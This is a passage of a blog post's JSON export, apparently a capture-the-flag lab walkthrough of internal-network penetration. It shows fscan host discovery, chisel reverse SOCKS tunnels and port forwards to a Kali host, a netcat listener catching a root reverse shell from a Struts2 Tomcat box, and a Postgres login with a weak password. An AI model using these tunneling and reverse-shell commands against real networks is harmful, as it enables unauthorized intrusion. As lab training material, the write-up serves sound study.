forever\n31: eth1@if32: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:ac:38:66:04 brd ff:ff:ff:ff:ff:ff\n    inet 172.56.102.4\/24 brd 172.56.102.255 scope global eth1\n       valid_lft forever preferred_lft forever<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>3d746bf3ad56:\/var\/www\/html\/tmp# route -n\nroute -n\nKernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use Iface\n0.0.0.0         10.85.101.1     0.0.0.0         UG    0      0        0 eth0\n10.85.101.0     0.0.0.0         255.255.255.0   U     0      0        0 eth0\n172.56.102.0    0.0.0.0         255.255.255.0   U     0      0        0 eth1<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Lateral movement<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/fscan -h 172.56.102.1-255\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.4\nstart infoscan\n(icmp) Target 172.56.102.1    is alive\n(icmp) Target 172.56.102.2    is alive\n(icmp) Target 172.56.102.3    is alive\n(icmp) Target 172.56.102.4    is alive\n&#91;*] Icmp alive hosts len is: 4\n172.56.102.4:80 open\n172.56.102.4:9000 open\n172.56.102.3:8080 open\n172.56.102.1:22 open\n172.56.102.2:5432 open\n172.56.102.3:8009 open<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">172.56.102.3:8080 open<br>172.56.102.3:8009 open<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">172.56.102.2:5432 open<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;+] Postgres:172.56.102.2:5432:postgres password\n\n&#91;*] WebTitle http:\/\/172.56.102.3:8080  code:200 len:90     title:$Title$\n&#91;+] PocScan http:\/\/172.56.102.3:8080 poc-yaml-struts2_045 poc1<\/code><\/pre>\n\n\n\n<h2 
class=\"wp-block-heading\">\u5efa\u7acb\u7aef\u53e3\u8f6c\u53d1<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">phpadmin 10.85.101.0 \u7f51\u6bb5\u65e0\u6cd5\u5c80\u7f51<br>\u5148\u5728tp\u4e0a\u8fd0\u884cclient \uff0c\u5728tp\u768410130\u7aef\u53e3\u4e0a\u76d1\u542c\uff0c\u7136\u540eserver \u8f6c\u53d1\u5230kali\u7684 10130\u7aef\u53e3<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ 2025\/06\/06 16:46:05 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 16:46:05 client: tun: proxy#10130=&gt;10130: Listening\n2025\/06\/06 16:46:05 client: Connected (Latency 375.204\u00b5s)\n\n\nbash-5.1$ netstat -nltp\nnetstat -nltp\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 127.0.0.11:34853        0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      51\/python3          \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::10130                :::*                    LISTEN      58\/.\/chisel         \ntcp6       0      0 :::8888                 :::*                    LISTEN      37\/.\/chisel         \ntcp6       0      0 :::9000                 :::*                    LISTEN      16\/sh <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u5728 phpadmin \u8fd0\u884cclient \uff0c\u5efa\u7acb\u53cd\u5411\u4ee3\u7406 \u8fc7tp \u5230kali\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/chisel client 10.85.101.2:10130 R:1090:socks&amp;\n&#91;1] 202\n3d746bf3ad56:\/tmp# 2025\/06\/06 16:49:58 client: Connecting to ws:\/\/10.85.101.2:10130\n2025\/06\/06 16:49:58 client: Connected (Latency 
954.415\u00b5s)\n\n\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 11:24:12 server: Reverse tunnelling enabled\n2025\/06\/06 11:24:12 server: Fingerprint WaU49cAGmz8CWYrAQkfIALhSEsUcAoFWQnjHnhGmRl8=\n2025\/06\/06 11:24:12 server: Listening on http:\/\/0.0.0.0:10130\n2025\/06\/06 11:45:45 server: session#1: tun: proxy#R:10800=&gt;192.168.100.2:80: Listening\n2025\/06\/06 11:52:32 server: session#2: tun: proxy#R:127.0.0.1:1080=&gt;socks: Listening\n2025\/06\/06 12:49:59 server: session#5: tun: proxy#R:127.0.0.1:1090=&gt;socks: Listening<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Struts2 rce<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains git clone https:\/\/github.com\/HatBoy\/Struts2-Scan.git did not work<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011443-1-1024x510.png\" alt=\"\" class=\"wp-image-1130\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Set up the SOCKS proxy<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011600-1024x352.png\" alt=\"\" class=\"wp-image-1132\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011537-1024x63.png\" alt=\"\" class=\"wp-image-1131\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">flag.txt<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-011726-1024x327.png\" alt=\"\" class=\"wp-image-1133\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Port forwarding<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">On phpadmin the client listens on port 8888 and the server forwards it to port 8888 on kali<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>3d746bf3ad56:\/tmp# .\/chisel client 10.85.101.2:10130 0.0.0.0:8888:0.0.0.0:8888:&amp;\n&lt;lient 10.85.101.2:10130 0.0.0.0:8888:0.0.0.0:8888:&amp;\n&#91;2] 221\n3d746bf3ad56:\/tmp# 2025\/06\/06 17:23:24 client: Connecting to ws:\/\/10.85.101.2:10130\n2025\/06\/06 17:23:24 client: tun: proxy#8888=&gt;0.0.0.0:8888: Listening\n2025\/06\/06 17:23:24 client: Connected (Latency 813.581\u00b5s)\n\n\n\n3d746bf3ad56:\/tmp# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n29: eth0@if30: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:0a:55:65:04 brd ff:ff:ff:ff:ff:ff\n    inet 10.85.101.4\/24 brd 10.85.101.255 scope global eth0\n       valid_lft forever preferred_lft forever\n31: eth1@if32: 
&lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:ac:38:66:04 brd ff:ff:ff:ff:ff:ff\n    inet 172.56.102.4\/24 brd 172.56.102.255 scope global eth1\n       valid_lft forever preferred_lft forever\n3d746bf3ad56:\/tmp# netstat -nltp\nnetstat -nltp\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      144\/nginx: master p\ntcp        0      0 127.0.0.11:45977        0.0.0.0:*               LISTEN      -\ntcp        0      0 :::9000                 :::*                    LISTEN      141\/php-fpm.conf)\ntcp        0      0 :::8888                 :::*                    LISTEN      221\/chisel<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Reverse shell<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-012418-1024x312.png\" alt=\"\" class=\"wp-image-1134\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ rlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;127.0.0.1] from 
(UNKNOWN) &#91;127.0.0.1] 43418\nbash: cannot set terminal process group (1): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@bee75906c832:\/usr\/local\/tomcat# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n17: eth0@if18: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default \n    link\/ether 02:42:ac:38:66:03 brd ff:ff:ff:ff:ff:ff\n    inet 172.56.102.3\/24 brd 172.56.102.255 scope global eth0\n       valid_lft forever preferred_lft forever\nroot@bee75906c832:\/usr\/local\/tomcat# <\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Postgres weak password<\/h4>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"wp-block-paragraph\">172.56.102.2:5432:<br>postgres: password<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains pgcli -h 172.56.102.2 -u postgres                    <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code># Common psql meta-commands\n\\l          # list all databases\n\\c dbname   # switch to the given database\n\\d          # list all tables in the current database\n\\d table    # show the structure of the given table\n\\du         # list all users and roles\n\\q          # quit psql<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains pgcli -h 172.56.102.2 -u postgres                    \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1090  ...  172.56.102.2:5432  ...  
OK\nPassword for postgres: \n&#91;proxychains] Strict chain  ...  127.0.0.1:1090  ...  172.56.102.2:5432  ...  OK\n&#91;proxychains] Strict chain  ...  127.0.0.1:1090  ...  172.56.102.2:5432  ...  OK\nServer: PostgreSQL 17.5\nVersion: 4.1.0\nHome: http:\/\/pgcli.com\npostgres&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img src=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-07-013653.png\" alt=\"\" class=\"wp-image-1135\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>First internal network start shiro rce reverse shell download tools chisel + fscan +busy 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1117","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1117"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1117\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1117"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}